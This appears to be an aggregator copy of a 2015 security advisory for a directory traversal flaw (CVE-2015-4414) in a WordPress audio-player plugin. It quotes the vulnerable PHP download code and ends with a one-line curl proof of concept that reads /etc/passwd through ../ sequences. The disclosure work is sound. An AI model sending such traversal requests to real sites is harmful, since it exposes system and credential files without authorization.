WordPress SE HTML5 Album Audio Player 1.1.0 Directory Traversal

🗓️ 11 Jun 2015 00:00:00Reported by Larry W. CashdollarType

packetstorm🔗 packetstormsecurity.com👁 30 Views

Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0 allows unauthorized file downloa

Reporter	Title	Published	Views	Family All 12
0day.today	WordPress SE HTML5 Album Audio Player 1.1.0 Directory Traversal Vulnerability	12 Jun 201500:00	–	zdt
Circl	CVE-2015-4414	12 Jun 201500:00	–	circl
CNVD	WordPress SE HTML5 Album Audio Player Plugin Directory Traversal Vulnerability	16 Jun 201500:00	–	cnvd
CVE	CVE-2015-4414	17 Jun 201518:00	–	cve
Cvelist	CVE-2015-4414	17 Jun 201518:00	–	cvelist
EUVD	EUVD-2015-4434	7 Oct 202500:30	–	euvd
Nuclei	WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal	6 Jun 202603:01	–	nuclei
NVD	CVE-2015-4414	17 Jun 201518:59	–	nvd
OpenVAS	WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP)	20 Nov 202000:00	–	openvas
Prion	Directory traversal	17 Jun 201518:59	–	prion

`Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-06-06  
Advisory: http://www.vapid.dhs.org/advisory.php?v=124  
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/  
Vendor: https://profiles.wordpress.org/sedevelops/  
Vendor Notified: 2015-06-06  
Vendor Contact: https://profiles.wordpress.org/sedevelops/  
Description:   
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.  
  
Vulnerability:  
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.  
  
This vulnerability doesn’t require authentication to the Wordpress site.  
  
File ./se-html5-album-audio-player/download_audio.php:  
  
3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];  
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');  
5 // make sure it's a file before doing anything!  
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {  
7   
8 // required for IE  
9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }  
10   
11 // get the file mime type using the file extension  
12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {  
13 case 'pdf': $mime = 'application/pdf'; break;  
14 case 'zip': $mime = 'application/zip'; break;  
15 case 'jpeg':  
16 case 'jpg': $mime = 'image/jpg'; break;  
17 default: $mime = 'application/force-download';  
18 }  
19 header('Pragma: public'); // required  
20 header('Expires: 0'); // no cache  
21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');  
22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');  
23 header('Cache-Control: private',false);  
24 header('Content-Type: '.$mime);  
25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"');  
26 header('Content-Transfer-Encoding: binary');   
27 header('Content-Length: '.filesize($file_name)); // provide file size  
28 header('Connection: close');  
29 readfile($file_name); // push it out  
30 exit();  
  
The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.  
  
CVEID: 2015-4414  
OSVDB:  
Exploit Code:  
• $ curl http://www.vapidlabs.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd  
`

11 Jun 2015 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.09051